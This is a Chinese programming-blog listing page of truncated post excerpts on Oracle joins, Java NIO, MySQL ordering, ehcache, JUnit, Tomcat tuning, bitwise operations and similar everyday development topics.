           每个人都有自己的青春之歌............但是我要说的却不是青春...        大家如果在自己的职业生涯没有给自己以后创业留一点点机会,仅仅凭学历和人脉关系,是难以在竞争激烈的市场中生存下去的....   &nbs
  • oracle连接(join)中使用using关键字 daizj JOINoraclesqlusing
    在oracle连接(join)中使用using关键字 34. View the Exhibit and examine the structure of the ORDERS and ORDER_ITEMS tables. Evaluate the following SQL statement: SELECT oi.order_id, product_id, order_date FRO
  • NIO示例 daysinsun nio
    NIO服务端代码: public class NIOServer { private Selector selector; public void startServer(int port) throws IOException { ServerSocketChannel serverChannel = ServerSocketChannel.open(
  • C语言学习homework1 dcj3sjt126com chomework
    0、 课堂练习做完 1、使用sizeof计算出你所知道的所有的类型占用的空间。 int x; sizeof(x);   sizeof(int);   # include <stdio.h> int main(void) { int x1; char x2; double x3; float x4; printf(&quo
  • select in order by , mysql排序 dcj3sjt126com mysql
    If i select like this: SELECT id FROM users WHERE id IN(3,4,8,1); This by default will select users in this order 1,3,4,8, I would like to select them in the same order that i put IN() values so:
  • 页面校验-新建项目 fanxiaolong 页面校验
    $(document).ready( function() { var flag = true; $('#changeform').submit(function() { var projectScValNull = true; var s =""; var parent_id = $("#parent_id").v
  • Ehcache(02)——ehcache.xml简介 234390216 ehcacheehcache.xml简介
    ehcache.xml简介          ehcache.xml文件是用来定义Ehcache的配置信息的,更准确的来说它是定义CacheManager的配置信息的。根据之前我们在《Ehcache简介》一文中对CacheManager的介绍我们知道一切Ehcache的应用都是从CacheManager开始的。在不指定配置信
  • junit 4.11中三个新功能 jackyrong java
    junit 4.11中两个新增的功能,首先是注解中可以参数化,比如 import static org.junit.Assert.assertEquals; import java.util.Arrays; import org.junit.Test; import org.junit.runner.RunWith; import org.junit.runn
  • 国外程序员爱用苹果Mac电脑的10大理由 php教程分享 windowsPHPunixMicrosoftperl
    Mac 在国外很受欢迎,尤其是在 设计/web开发/IT 人员圈子里。普通用户喜欢 Mac 可以理解,毕竟 Mac 设计美观,简单好用,没有病毒。那么为什么专业人士也对 Mac 情有独钟呢?从个人使用经验来看我想有下面几个原因: 1、Mac OS X 是基于 Unix 的 这一点太重要了,尤其是对开发人员,至少对于我来说很重要,这意味着Unix 下一堆好用的工具都可以随手捡到。如果你是个 wi
  • 位运算、异或的实际应用 wenjinglian 位运算
    一. 位操作基础,用一张表描述位操作符的应用规则并详细解释。       二. 常用位操作小技巧,有判断奇偶、交换两数、变换符号、求绝对值。       三. 位操作与空间压缩,针对筛素数进行空间压缩。    &n
  • weblogic部署项目出现的一些问题(持续补充中……) Everyday都不同 weblogic部署失败
    好吧,weblogic的问题确实……   问题一: org.springframework.beans.factory.BeanDefinitionStoreException: Failed to read candidate component class: URL [zip:E:/weblogic/user_projects/domains/base_domain/serve
  • tomcat7性能调优(01) toknowme tomcat7
        Tomcat优化: 1、最大连接数最大线程等设置 <Connector port="8082" protocol="HTTP/1.1"                useBodyEncodingForURI="t
  • PO VO DAO DTO BO TO概念与区别 xp9802 javaDAO设计模式bean领域模型
    O/R Mapping 是 Object Relational Mapping(对象关系映射)的缩写。通俗点讲,就是将对象与关系数据库绑定,用对象来表示关系数据。在O/R Mapping的世界里,有两个基本的也是重要的东东需要了解,即VO,PO。 它们的关系应该是相互独立的,一个VO可以只是PO的部分,也可以是多个PO构成,同样也可以等同于一个PO(指的是他们的属性)。这样,PO独立出来,数据持
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他